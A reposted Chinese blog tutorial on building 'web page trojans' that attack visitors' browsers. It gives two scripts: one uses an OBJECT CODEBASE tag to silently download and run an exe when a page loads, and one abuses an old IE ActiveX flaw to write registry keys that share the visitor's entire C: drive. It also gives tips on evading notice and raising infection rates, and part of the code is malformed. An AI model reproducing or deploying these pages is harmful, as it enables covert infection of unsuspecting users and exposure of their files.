制作网页木马

大家对木马都不陌生了，它可能要算是计算机病毒史上最厉害的了，相信会使木马的人千千万万，但是有很多人苦于怎么把木马发给对方，现在随着计算机的普及，在网络上我相信很少有人会再轻易的接收对方的文件了，所以网页木马诞生了。 

1.它应该算是html带动同路径下的一个exe的文件的主页了，也就是当浏览器浏览这个页面的时候，一个exe的文件就在后台自动下载并执行了，可以做一个test.html的文件在桌面，内容如下： 

<script language="javascript"> 

run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" 

run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">" 

run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">" 

run_exe+="</OBJECT>" 

run_exe+="<HTML><H1>网页加载中，请稍后....</H1></HTML>"; 

document.open(); 

document.clear(); 

document.writeln(run_exe); 

document.close(); 

</script> 

再在桌面下随便找个exe的文件，名字一定要改为tset.exe，好了，这时候双击我们刚才生成的html文件，当看到“网页加载中，请稍后....”的时候，我们的那个同路径下的exe文件也被无条件执行了，这种页面的优点就是编译修改简单，但是！当你申请下了一个个人主页空间的时候，把这两个文件上传上去的时候，当你试图通过浏览器浏览你的杰作的时候，ie的安全警告跳了出来，我想没有几个人愿意乖乖的冒着风险去点“是”，好了，尽管这个网页木马在本地是多么的完美，但是放到了网上就通不过ie的安全策略了，这个小马失败了。 

2.是通过ie自身的漏洞写入注册表，相信很多人经常在浏览一些主页的时候，注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等，这些都是自动修改了你的注册表的网页的杰作，所以我门也可以做个页面让浏览者的硬盘完全共享，也是做个html的文件，内容如下： 

script language=javascript> 

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); 

function f(){ 

a1=document.applets[0]; 

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 

a1.createInstance(); 

Shl = a1.GetObject(); 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD"); 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD" 

); 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\"); 

} 

function init() 

{ 

setTimeout("f()", 1000); 

init(); 

这种网页木马的特点是比较安全，不宜被对方发现，但是使用麻烦需要牵扯到很多的东西。 

这种网页木马的特点是，对方挨种率较高，除了制作麻烦一点外，没有什么缺点啦 

好了所有的漏洞都是建立在系统漏洞的前提下，多升级多打补丁没有坏处

本文转自loveme2351CTO博客，原文链接：http://blog.51cto.com/loveme23/8514 ，如需转载请自行联系原作者